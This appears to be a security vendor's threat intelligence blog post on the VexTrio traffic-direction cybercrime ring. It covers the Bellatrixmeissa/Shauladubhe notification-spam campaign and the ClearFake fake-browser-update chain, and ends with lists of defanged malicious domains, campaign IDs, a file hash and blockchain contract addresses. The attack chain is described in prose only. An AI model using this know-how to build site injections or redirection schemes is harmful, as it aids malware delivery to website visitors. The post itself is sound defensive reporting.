Upcoming Webinar
Navigating Your Zero Trust Journey: Key Consideration and Best Practice for 2025
Icon Rounded Closed - BRIX Templates

VexTrio: Inside a global cybercrime ring

|

Executive Summary 

During routine alert review of zero hour alerts, the Menlo Security Threat Intelligence team discovered users visiting compromised sites. These sites are part of a bigger crime organization VexTrio, using the Traffic Direction System (TDS). We saw two notable campaigns associated with this organization and what appeared to be an infrastructure change. In this write up we will discuss what we saw from the victim’s point of view visiting this cybercrime ring's infrastructure.

What is a Traffic Direction System (TDS)? Traffic Direction System: A system that can use a network of hacked servers to route victims to domains that distribute malware, ads, or run scamming schemes.

VexTrio: Anatomy of a cybercrime ring

VexTrio uses an affiliate program that allows affiliates to access their TDS. Attackers compromise WordPress websites, injecting malicious JavaScript that serves to route traffic to the TDS based on specific criteria (discussed below). Depending on the victim's operating system (OS) fingerprint, they will be routed to different affiliates. Infoblox published an article, written by Christopher Kim and Randy McEoin, where they discovered Vextrio in January 2024. We will focus on two campaigns Menlo has unique insights into: “Bella turned Shaul campaign” and “ClearFake”.

https://blogs.infoblox.com/threat-intelligence/cybercrime-central-vextrio-operates-massive-criminal-affiliate-program/

Campaign 1: Bella to Shaul 

The Bellatrixmeissa domain is a malicious site, previously reported by Malwaretips and others, uses social engineering tactics to trick users into enabling browser notifications. Victims are then bombarded with various ads, which subtly advertise a range of malware, from Greyware to Gootloader. Menlo Security has also been able to observe this attack across Asia, North America, Europe, the Middle East, Australia, and South America.

When investigating this, we uncovered how prolific this campaign had been across Menlo customers since March, and we uncovered a shoft to new infrastructure: shauladubhe[.]com. As activity associated with Bellatrixmeissa declined, the rate of Shauladubhe rapidly increased, showing the threat actors moving their operation from one to the other.

Past 215 days activity across all customers. Taken 15th October

Over 140 days, the following campaign IDs were identified within our environment:

  • CHbdBrRj60iP0ZNnHuMm7w 
  • EOLqXWl7sEqTC3w7GMZt4A 
  • l-C8wnA9n02pICp-zt1xVA 
  • TMO4rBkyiESdae2M5urijA 
  • CHiI7Gh3GUyTa8XGgNqDyQ 

Adware

With high probability we assess VexTrio is involved, as key identifiers of their previous attacks are reported to be: 

  • A translator javascript file: trls.js some text
    • (e.g. SHA256: e2bb1401d6b8d6038ff8411fd0f6280890ecd1f32e3e90f4c7fededf2801339)
    • URL paths: /space-robot/ and /eyes-robot/.
  • (Further IOC’s are included under references)

In these attacks, we were able to see both of the previously reported IOC’s above, ultimately leading us to a high probability, this is also VexTrio.

Campaign 2: ClearFake 

ClearFake is a malicious JavaScript framework that dynamically presents website visitors with harmful content via an HTML iframe. Users are tricked into clicking a fake browser update button that eventually leads to a malware infection (e.g. the Amadey infostealer). We know that ClearFake has been an affiliate of VexTrio for at least five months. 

User visits a compromised website injected with malicious JavaScript.

The injected code calls the API of the popular cryptocurrency exchange platform Binance.

Obfuscated JavaScript is returned and executed.

ClearFake's TDS, running Keitaro, is contacted.

Keitaro redirects the user to VexTrio's TDS.

ClearFake Attack Chain:

1. User visits the compromised website injected with malicious JavaScript 

2. The injected code calls the API of popular cryptocurrency exchange platform Binance 3. Obfuscated Javascript is returned and evaluated 

4. ClearFake TDS running Keitaro is called 

5. The response from Keitaro is a redirection to VexTrio TDS 

From https://blogs.infoblox.com/threat-intelligence/cybercrime-central-vextrio-operates massive-criminal-affiliate-program/ 

Internal customer data showing compromised sites referring to ClearFake. 

Unraveling the ClearFake chain 

When the users visit the compromised site, a script would run to fingerprint their browser (rocketlazyloadscript). If the user's browser is Internet Explorer and meets other conditions, it manipulates the current URL to include a ‘nowprocket’ parameter and then reloads the page with this new URL.

The script then triggers the Binance/ClearFake script called “ethers.js” to run. 

These conditions are based on various events, such as when the page has fully loaded (window.onload), when the user navigates to the page via the back or forward buttons (pageshow  event), and when the Document Object Model (DOM) is ready (DOMContentLoaded event). 

However in this example, when the “ethers.js” script runs, it attempts to pull another script down. There is an error and responds with a console log message in Chinese that “there is no more”. Below you can see the console log message in base64. This also suggests that for this contract the next stage isn’t loaded. 

console log responses cleaned up via internal analyst tool

Notably, there appears to be a possible generic API key used to interact with “ethers[.]io” that 

loads automatically when the user visits the compromised site. 

In the console logs area, we can see the compromised site trying to inject script into the ethers.js script running on the compromised site. 

Contract analysis

The contract address inside this attack was 0xdf20921ea432318dd5906132edbc0c20353f72d6. We can see a couple transactions listed and it appears some transactions are spam related. 

https://blockchair.com/polygon/address/0xdf20921ea432318dd5906132edbc0c20353f72d6

Another contract we saw but didn’t include in this analysis is 0x34585777843Abb908a1C5FbD6F3f620bC56874AA.

Impact and conclusion

We assess the VexTrio cybercrime ring to continue to be a prevalent and a substantial global threat, impacting all sectors with its large-scale operation. We will continue to monitor related campaigns. 

Visiting a compromised WordPress site that is part of the VexTrio cybercrime ring poses significant risks to users, organizations, and the broader internet ecosystem. These sites are being used to deliver a variety of payloads including, but not exclusive to adverts, PUPs and malware. This undermines cybersecurity efforts and creates severe consequences to organizations: 

  1. Data Theft and Privacy Breaches: Compromised sites can harvest personal information, including login credentials, financial details, and sensitive data. 
    • If a users' privacy is severely compromised, it could lead to potential identity theft and financial loss or abuse of corporate credentials. 
  2. Malware Infection: These sites frequently distribute malware that can infect users' devices. Once malware is installed, it can lead to system damage, data corruption, and unauthorized access to personal and organizational networks.
  3. Financial Loss: Users may face direct financial losses due to stolen payment information or indirect costs from repairing malware damage.  
    • Additionally, businesses can suffer financial repercussions from reputational damage and legal liabilities as well as restoring infected systems. 
  4. Spread of Cybercrime: By interacting with these sites, users inadvertently contribute to the cybercrime ecosystem. This activity supports the operation of criminal networks and enables them to perpetuate further cyber attacks.
  5. Compromised Network Security: Infected devices can become entry points for broader network attacks, affecting entire organizations. This can result in significant disruptions, data breaches, and extensive recovery efforts.
  6. Erosion of Trust: The prevalence of compromised sites erodes trust in digital platforms and services. Users become wary of online interactions, which can stifle online engagement.

IOCs 

Domains 

cebue[.]check-tl-ver-106-1[.]com 

ja[.]check-tl-ver-246-3[.]com 

mvgde[.]check-tl-ver-116-2[.]com 

pojyq[.]check-tl-ver-246-3[.]com 

rqstz[.]check-tl-ver-54-1[.]com 

ud[.]check-tl-ver-54-1[.]com

qltuh[.]bellatrixmeissa[.]com  

qltuh[.]shauladubhe[.]com  

*[.]shauladubhe[.]com  

qltuh[.]check-tl-ver-246-3[.]com 

qltuh[.]check-tl-ver-116-3[.]com 

qltuh[.]check-tl-ver-176-1[.]com 

xx62hrg[.]megabonus-gains[.]life 

bsc-dataseed1[.]binance[.]org 

cdn[.]ethers[.]io 

URL paths that are campaigns 

CHbdBrRj60iP0ZNnHuMm7w 

EOLqXWl7sEqTC3w7GMZt4A 

l-C8wnA9n02pICp-zt1xVA 

TMO4rBkyiESdae2M5urijA 

References

VexTrio at the Center of Affiliate Cybercrime Program | Infoblox

JavaScript Malware Switches to Server-Side Redirects & DNS TXT Records as TDS

Bellatrixmeissa.com Virus: What Is It And How To Stop Pop-ups

Menlo Security

menlo security logo
linkedin logotwitter/x logofacebook logoSocial share icon via eMail